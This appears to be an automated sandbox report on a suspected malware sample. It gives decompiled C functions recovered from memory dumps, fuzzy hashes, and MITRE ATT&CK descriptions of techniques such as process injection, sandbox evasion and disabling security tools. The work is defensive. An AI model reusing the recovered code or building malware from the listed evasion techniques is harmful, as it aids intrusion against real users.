0x00000000
0x003b8d12
0x003b8eb8
0x003b8ebb
0x003b8ecb
0x003b8ecb
0x003b8ebb
0x003b8cfa
0x003b8d68
0x003b8d6d
0x003b8d73
0x003b8d79
0x003b8d8c
0x003b8d8f
0x003b8d94
0x003b8d9c
0x003b8d9c
0x003b8da4
0x003b8dae
0x003b8db2
0x003b8db3
0x003b8db8
0x003b8dbb
0x003b8dbf
0x003b8e09
0x003b8dc1
0x003b8dc3
0x003b8dc5
0x003b8dc8
0x003b8dcd
0x003b8dcf
0x003b8dd2
0x003b8dd4
0x003b8dd4
0x003b8dd5
0x003b8dda
0x003b8de1
0x00000000
0x00000000
0x003b8de3
0x003b8de7
0x003b8ded
0x00000000
0x00000000
0x00000000
0x003b8ded
0x003b8def
0x003b8def
0x003b8dcd
0x003b8df2
0x003b8df4
0x003b8df5
0x003b8df9
0x003b8dfe
0x003b8e02
0x003b8e02
0x003b8e10
0x003b8e13
0x003b8d7b
0x003b8d7b
0x003b8d7b
0x003b8e17
0x003b8e1d
0x003b8e27
0x003b8e27
0x003b8e2a
0x003b8e2b
0x003b8e30
0x00000000
0x00000000
0x003b8e3c
0x003b8e21
0x003b8e24
0x00000000
0x003b8e24
0x00000000
0x003b8e3c
0x003b8ed5
0x003b8ed5
0x003b8e17
0x003b8cdd
0x003b8eaa
0x003b8eb5

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction ID: 56f7fb8d0655288fb3c0fecd73d5d3de621cbf1da10c6730af35cc7d0b3fabce
Opcode Fuzzy Hash: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction Fuzzy Hash: 00515A61A0071286D7264F29C8912B772AAFFE4358B2AC23DDB558BB94FF71CC01C241

Uniqueness

Uniqueness Score: -1.00%

Function 003B8AB0, Relevance: .2, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003B8AB0(signed int __ecx, signed int _a4, signed int _a8) {
				signed int _v32;
				signed int* _v36;
				signed int _t44;
				signed int _t45;
				signed int* _t46;
				signed int _t51;
				signed short* _t52;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				unsigned int _t67;
				signed int _t68;
				signed short* _t70;
				signed int _t71;
				signed short* _t73;
				void* _t83;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				signed short** _t93;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				void* _t104;

				_t60 = __ecx;
				_t104 = (_t102 & 0xfffffff0) - 0x14;
				_t93 = __ecx;
				_t98 = _a4;
				_t51 = _a8;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(_t98 == 0 || ( *_t98 & 0x0000ffff) == 0) {
					_push(0x80);
					_t52 = E003B1030();
					_t104 = _t104 + 4;
					_t73 =  *_t93;
					if(_t73 == 0) {
						 *_t52 = 0;
					} else {
						if(_t52 != 0) {
							_t61 =  *_t73 & 0x0000ffff;
							 *_t52 = _t61;
							if(_t61 != 0) {
								_t62 = 0;
								while(1) {
									_t62 = _t62 + 1;
									_t100 =  *(_t73 + _t62 * 4 - 2) & 0x0000ffff;
									 *(_t52 + _t62 * 4 - 2) = _t100;
									if(_t100 == 0) {
										goto L42;
									}
									_t101 =  *(_t73 + _t62 * 4) & 0x0000ffff;
									 *(_t52 + _t62 * 4) = _t101;
									if(_t101 != 0) {
										continue;
									}
									goto L42;
								}
							}
						}
						L42:
						_push(2);
						_push(_t73);
						E003B10B0();
						_t104 = _t104 + 8;
					}
					_t93[1] = 0x40;
					 *_t93 = _t52;
				} else {
					if(_t51 == 0) {
						_t88 = _t98 & 0x0000000f;
						if(_t88 == 0) {
							L8:
							asm("pxor xmm0, xmm0");
							_t51 =  ~( ~_t88 + 0x00000007 & 0x00000007) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [esi+edx*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t60 != 0) {
									break;
								}
								_t88 = _t88 + 8;
								if(_t88 < _t51) {
									continue;
								} else {
									if(_t51 >= 0x7fffffff) {
										goto L14;
									} else {
										goto L12;
									}
								}
								goto L15;
							}
							asm("bsf ebx, ecx");
							_t51 = (_t51 >> 1) + _t88;
						} else {
							_t51 = 0;
							if((_t88 & 0x00000001) != 0) {
								L12:
								while(( *(_t98 + _t51 * 2) & 0x0000ffff) != 0) {
									_t51 = _t51 + 1;
									if(_t51 < 0x7fffffff) {
										continue;
									} else {
										L14:
										_t51 = 0x7fffffff;
									}
									goto L15;
								}
							} else {
								_t88 =  ~_t88 + 0x10 >> 1;
								while(1) {
									_t60 =  *(_t98 + _t51 * 2) & 0x0000ffff;
									if(_t60 == 0) {
										goto L15;
									}
									_t51 = _t51 + 1;
									if(_t51 < _t88) {
										continue;
									} else {
										goto L8;
									}
									goto L15;
								}
							}
						}
					}
					L15:
					_t10 = _t51 + 1; // -2147483653
					_t44 =  <=  ? 0x40 : _t10;
					if(_t44 > 0) {
						_t67 = (_t44 >> 5 >> 0x1a) + _t44 >> 6;
						_t45 = _t44 & 0x8000003f;
						if(_t45 < 0) {
							_t45 = (_t45 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t68 = _t67 + (0 | _t45 > 0x00000000);
						_v32 = _t68 << 6;
						_push(_t68 << 7);
						_t46 = E003B1030();
						_t104 = _t104 + 4;
						_t70 =  *_t93;
						if(_t70 == 0) {
							 *_t46 = 0;
						} else {
							if(_t46 != 0) {
								_t85 =  *_t70 & 0x0000ffff;
								 *_t46 = _t85;
								if(_t85 != 0) {
									_v36 = _t93;
									_t86 = 0;
									while(1) {
										_t86 = _t86 + 1;
										_t95 =  *(_t70 + _t86 * 4 - 2) & 0x0000ffff;
										 *(_t46 + _t86 * 4 - 2) = _t95;
										if(_t95 == 0) {
											break;
										}
										_t96 =  *(_t70 + _t86 * 4) & 0x0000ffff;
										_t46[_t86] = _t96;
										if(_t96 != 0) {
											continue;
										}
										break;
									}
									_t93 = _v36;
								}
							}
							_push(2);
							_push(_t70);
							_v36 = _t46;
							E003B10B0();
							_t46 = _v36;
							_t104 = _t104 + 8;
						}
						_t93[1] = _v32;
						 *_t93 = _t46;
					} else {
						_t46 = 0;
					}
					if(_t46 != 0) {
						_t83 = 0;
						while(1) {
							_t71 =  *_t98 & 0x0000ffff;
							_t83 = _t83 + 1;
							 *_t46 = _t71;
							if(_t51 != 0 && _t83 == _t51) {
								break;
							}
							if(_t71 != 0) {
								_t46 =  &(_t46[0]);
								_t98 = _t98 + 2;
								continue;
							}
							goto L45;
						}
						_t46[0] = 0;
					}
				}
				L45:
				return _t93;
			}

0x003b8ab0
0x003b8ab9
0x003b8abc
0x003b8abe
0x003b8ac3
0x003b8ac6
0x003b8ac8
0x003b8acd
0x003b8c23
0x003b8c2d
0x003b8c2f
0x003b8c32
0x003b8c36
0x003b8c72
0x003b8c38
0x003b8c3a
0x003b8c3c
0x003b8c3f
0x003b8c44
0x003b8c46
0x003b8c48
0x003b8c48
0x003b8c49
0x003b8c4e
0x003b8c55
0x00000000
0x00000000
0x003b8c57
0x003b8c5b
0x003b8c61
0x00000000
0x00000000
0x00000000
0x003b8c61
0x003b8c48
0x003b8c44
0x003b8c63
0x003b8c63
0x003b8c65
0x003b8c66
0x003b8c6b
0x003b8c6b
0x003b8c75
0x003b8c7c
0x003b8ade
0x003b8ae0
0x003b8ae4
0x003b8ae7
0x003b8b04
0x003b8b08
0x003b8b14
0x003b8b1a
0x003b8b1a
0x003b8b1f
0x003b8b23
0x003b8b29
0x00000000
0x00000000
0x003b8b2f
0x003b8b34
0x00000000
0x003b8b36
0x003b8b3c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8b3c
0x00000000
0x003b8b34
0x003b8c94
0x003b8c99
0x003b8ae9
0x003b8ae9
0x003b8aee
0x00000000
0x003b8b3e
0x003b8b46
0x003b8b4d
0x00000000
0x003b8b4f
0x003b8b4f
0x003b8b4f
0x003b8b4f
0x00000000
0x003b8b4d
0x003b8af0
0x003b8af5
0x003b8af7
0x003b8af7
0x003b8afd
0x00000000
0x00000000
0x003b8aff
0x003b8b02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8b02
0x003b8af7
0x003b8aee
0x003b8ae7
0x003b8b54
0x003b8b59
0x003b8b5f
0x003b8b64
0x003b8b77
0x003b8b7a
0x003b8b7f
0x003b8b87
0x003b8b87
0x003b8b8f
0x003b8b99
0x003b8b9d
0x003b8b9e
0x003b8ba3
0x003b8ba6
0x003b8baa
0x003b8bf4
0x003b8bac
0x003b8bae
0x003b8bb0
0x003b8bb3
0x003b8bb8
0x003b8bba
0x003b8bbd
0x003b8bbf
0x003b8bbf
0x003b8bc0
0x003b8bc5
0x003b8bcc
0x00000000
0x00000000
0x003b8bce
0x003b8bd2
0x003b8bd8
0x00000000
0x00000000
0x00000000
0x003b8bd8
0x003b8bda
0x003b8bda
0x003b8bb8
0x003b8bdd
0x003b8bdf
0x003b8be0
0x003b8be4
0x003b8be9
0x003b8bed
0x003b8bed
0x003b8bfb
0x003b8bfe
0x003b8b66
0x003b8b66
0x003b8b66
0x003b8c02
0x003b8c04
0x003b8c0e
0x003b8c0e
0x003b8c11
0x003b8c12
0x003b8c17
0x00000000
0x00000000
0x003b8c1f
0x003b8c08
0x003b8c0b
0x00000000
0x003b8c0b
0x00000000
0x003b8c1f
0x003b8c8e
0x003b8c8e
0x003b8c02
0x003b8c7e
0x003b8c89

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction ID: 536376e5b26dbeb4a8e03e01a20ed8561628662db94b379f34fd59d27e717773
Opcode Fuzzy Hash: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction Fuzzy Hash: 4B517DE1A0171246D72A8F39C8912B7B29AFFD4348B1AC23CDB524BF95FF718800C251

Uniqueness

Uniqueness Score: -1.00%

Function 003B88C0, Relevance: .2, Instructions: 182
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003B88C0(signed short** __ecx, signed int _a4) {
				signed int _v32;
				signed int* _v36;
				signed int _t43;
				signed int _t44;
				signed int* _t45;
				signed short* _t50;
				signed int _t57;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				unsigned int _t67;
				signed int _t68;
				signed short* _t70;
				signed int _t71;
				signed short* _t73;
				signed int _t77;
				void* _t85;
				signed int _t87;
				signed int _t88;
				signed short** _t93;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				void* _t104;

				_t104 = (_t102 & 0xfffffff0) - 0x14;
				_t93 = __ecx;
				_t60 = _a4;
				 *((intOrPtr*)(__ecx)) = 0;
				_t98 =  *_t60;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(_t98 == 0 || ( *_t98 & 0x0000ffff) == 0) {
					_push(0x80);
					_t50 = E003B1030();
					_t104 = _t104 + 4;
					_t73 =  *_t93;
					if(_t73 == 0) {
						 *_t50 = 0;
					} else {
						if(_t50 != 0) {
							_t61 =  *_t73 & 0x0000ffff;
							 *_t50 = _t61;
							if(_t61 != 0) {
								_t62 = 0;
								while(1) {
									_t62 = _t62 + 1;
									_t100 =  *(_t73 + _t62 * 4 - 2) & 0x0000ffff;
									 *(_t50 + _t62 * 4 - 2) = _t100;
									if(_t100 == 0) {
										goto L41;
									}
									_t101 =  *(_t73 + _t62 * 4) & 0x0000ffff;
									 *(_t50 + _t62 * 4) = _t101;
									if(_t101 != 0) {
										continue;
									}
									goto L41;
								}
							}
						}
						L41:
						_push(2);
						_push(_t73);
						E003B10B0();
						_t104 = _t104 + 8;
					}
					_t93[1] = 0x40;
					 *_t93 = _t50;
				} else {
					_t77 = _t98 & 0x0000000f;
					if(_t77 == 0) {
						L7:
						asm("pxor xmm0, xmm0");
						_t57 =  ~( ~_t77 + 0x00000007 & 0x00000007) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [esi+edx*2]");
							asm("pcmpeqw xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t60 != 0) {
								break;
							}
							_t77 = _t77 + 8;
							if(_t77 < _t57) {
								continue;
							} else {
								if(_t57 >= 0x7fffffff) {
									goto L13;
								} else {
									goto L11;
								}
							}
							goto L14;
						}
						asm("bsf ebx, ecx");
						_t57 = (_t57 >> 1) + _t77;
					} else {
						_t57 = 0;
						if((_t77 & 0x00000001) != 0) {
							L11:
							while(( *(_t98 + _t57 * 2) & 0x0000ffff) != 0) {
								_t57 = _t57 + 1;
								if(_t57 < 0x7fffffff) {
									continue;
								} else {
									L13:
									_t57 = 0x7fffffff;
								}
								goto L14;
							}
						} else {
							_t77 =  ~_t77 + 0x10 >> 1;
							while(1) {
								_t60 =  *(_t98 + _t57 * 2) & 0x0000ffff;
								if(_t60 == 0) {
									goto L14;
								}
								_t57 = _t57 + 1;
								if(_t57 < _t77) {
									continue;
								} else {
									goto L7;
								}
								goto L14;
							}
						}
					}
					L14:
					_t9 = _t57 + 1; // 0x80000000
					_t43 =  <=  ? 0x40 : _t9;
					if(_t43 > 0) {
						_t67 = (_t43 >> 5 >> 0x1a) + _t43 >> 6;
						_t44 = _t43 & 0x8000003f;
						if(_t44 < 0) {
							_t44 = (_t44 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t68 = _t67 + (0 | _t44 > 0x00000000);
						_v32 = _t68 << 6;
						_push(_t68 << 7);
						_t45 = E003B1030();
						_t104 = _t104 + 4;
						_t70 =  *_t93;
						if(_t70 == 0) {
							 *_t45 = 0;
						} else {
							if(_t45 != 0) {
								_t87 =  *_t70 & 0x0000ffff;
								 *_t45 = _t87;
								if(_t87 != 0) {
									_v36 = _t93;
									_t88 = 0;
									while(1) {
										_t88 = _t88 + 1;
										_t95 =  *(_t70 + _t88 * 4 - 2) & 0x0000ffff;
										 *(_t45 + _t88 * 4 - 2) = _t95;
										if(_t95 == 0) {
											break;
										}
										_t96 =  *(_t70 + _t88 * 4) & 0x0000ffff;
										_t45[_t88] = _t96;
										if(_t96 != 0) {
											continue;
										}
										break;
									}
									_t93 = _v36;
								}
							}
							_push(2);
							_push(_t70);
							_v36 = _t45;
							E003B10B0();
							_t45 = _v36;
							_t104 = _t104 + 8;
						}
						_t93[1] = _v32;
						 *_t93 = _t45;
					} else {
						_t45 = 0;
					}
					if(_t45 != 0) {
						_t85 = 0;
						while(1) {
							_t71 =  *_t98 & 0x0000ffff;
							_t85 = _t85 + 1;
							 *_t45 = _t71;
							if(_t57 != 0 && _t85 == _t57) {
								break;
							}
							if(_t71 != 0) {
								_t45 =  &(_t45[0]);
								_t98 = _t98 + 2;
								continue;
							}
							goto L44;
						}
						_t45[0] = 0;
					}
				}
				L44:
				return _t93;
			}

0x003b88c9
0x003b88cc
0x003b88ce
0x003b88d3
0x003b88d5
0x003b88d7
0x003b88dc
0x003b8a2e
0x003b8a38
0x003b8a3a
0x003b8a3d
0x003b8a41
0x003b8a7d
0x003b8a43
0x003b8a45
0x003b8a47
0x003b8a4a
0x003b8a4f
0x003b8a51
0x003b8a53
0x003b8a53
0x003b8a54
0x003b8a59
0x003b8a60
0x00000000
0x00000000
0x003b8a62
0x003b8a66
0x003b8a6c
0x00000000
0x00000000
0x00000000
0x003b8a6c
0x003b8a53
0x003b8a4f
0x003b8a6e
0x003b8a6e
0x003b8a70
0x003b8a71
0x003b8a76
0x003b8a76
0x003b8a80
0x003b8a87
0x003b88ed
0x003b88ef
0x003b88f2
0x003b890f
0x003b8913
0x003b891f
0x003b8925
0x003b8925
0x003b892a
0x003b892e
0x003b8934
0x00000000
0x00000000
0x003b893a
0x003b893f
0x00000000
0x003b8941
0x003b8947
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8947
0x00000000
0x003b893f
0x003b8a9f
0x003b8aa4
0x003b88f4
0x003b88f4
0x003b88f9
0x00000000
0x003b8949
0x003b8951
0x003b8958
0x00000000
0x003b895a
0x003b895a
0x003b895a
0x003b895a
0x00000000
0x003b8958
0x003b88fb
0x003b8900
0x003b8902
0x003b8902
0x003b8908
0x00000000
0x00000000
0x003b890a
0x003b890d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b890d
0x003b8902
0x003b88f9
0x003b895f
0x003b8964
0x003b896a
0x003b896f
0x003b8982
0x003b8985
0x003b898a
0x003b8992
0x003b8992
0x003b899a
0x003b89a4
0x003b89a8
0x003b89a9
0x003b89ae
0x003b89b1
0x003b89b5
0x003b89ff
0x003b89b7
0x003b89b9
0x003b89bb
0x003b89be
0x003b89c3
0x003b89c5
0x003b89c8
0x003b89ca
0x003b89ca
0x003b89cb
0x003b89d0
0x003b89d7
0x00000000
0x00000000
0x003b89d9
0x003b89dd
0x003b89e3
0x00000000
0x00000000
0x00000000
0x003b89e3
0x003b89e5
0x003b89e5
0x003b89c3
0x003b89e8
0x003b89ea
0x003b89eb
0x003b89ef
0x003b89f4
0x003b89f8
0x003b89f8
0x003b8a06
0x003b8a09
0x003b8971
0x003b8971
0x003b8971
0x003b8a0d
0x003b8a0f
0x003b8a19
0x003b8a19
0x003b8a1c
0x003b8a1d
0x003b8a22
0x00000000
0x00000000
0x003b8a2a
0x003b8a13
0x003b8a16
0x00000000
0x003b8a16
0x00000000
0x003b8a2a
0x003b8a99
0x003b8a99
0x003b8a0d
0x003b8a89
0x003b8a94

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction ID: 28124139a124aa841e4fab702c1cc6fb7a29af121c7605f0a43bc0efee240a0d
Opcode Fuzzy Hash: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction Fuzzy Hash: 36516FA1A0071246DB2A4F29C4916B773DAFFD5318B2EC23DDB954BB95FF318811C251

Uniqueness

Uniqueness Score: -1.00%

Function 003CCEF8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction ID: bce1e62e7ef5eeb761c78d4d280d7db8e5fe95c558888d3d15ece3e5f5ccdc69
Opcode Fuzzy Hash: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction Fuzzy Hash: 6941A27122422955EF379F298880FFE27969FA1758F16503EFE48C9584E732CC82D3A0

Uniqueness

Uniqueness Score: -1.00%

Function 003B96D0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: f231a75f12f3aa0297ca4bf7bbc02a447b6ed043f84ca97a03a9711e8aec4c83
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: 59413872A1422143C7254F29C8917A6B2D5AF95368F16833FEFA68BBD1EA358C51C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 003B2980, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a594af6f10d042832b02c12e546d473823ced92867163aea725e9241fd32f4e
Instruction ID: f8593855632c1887f31ac4f70e0ff268638c488e3a59df56d1ca8e189b81f1f4
Opcode Fuzzy Hash: 6a594af6f10d042832b02c12e546d473823ced92867163aea725e9241fd32f4e
Instruction Fuzzy Hash: FC41B1312042049BC716FF24CC52BEB73A8AF90708F45892DFA459FA92EF71AD55C791

Uniqueness

Uniqueness Score: -1.00%

Function 0025B5D0, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction ID: 152fde670097b45a9cc09aa6cb8f44f73e600ed325a4388268d3701e551e9547
Opcode Fuzzy Hash: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction Fuzzy Hash: CA313870A2010ACBCB59CF44C1956BEF7F6BF44312F648199DC06AB390D3749EA5CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0025B6E0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction ID: 5813e4f645538fb6f130c0bbe9594059631f05ff6e2432ae503bb90286c1c94a
Opcode Fuzzy Hash: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction Fuzzy Hash: D711B779A24209EFCB45CF58C090AADFBB1EB8C311F2085A9DC0997740D770EE95CB54

Uniqueness

Uniqueness Score: -1.00%

Function 002388DD, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction ID: 97e6ea353afa3a696489958d4f72068a5245fbe8939ebb33a4d05de284f480ae
Opcode Fuzzy Hash: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction Fuzzy Hash: D2012BB5808BE98FC702AF34C80455A3B21BE872307594399E5B11F2E6CB219417CB95

Uniqueness

Uniqueness Score: -1.00%

Function 003CBE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction ID: 0f3dd12b77d69a1da57a087571829295196cd2ed90cc58c3c91d9736e0258699
Opcode Fuzzy Hash: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction Fuzzy Hash: 88F0E235204612AAEF275E3DAC92FE672DC9F45B94F19056AB610C9594FB22CC044761

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
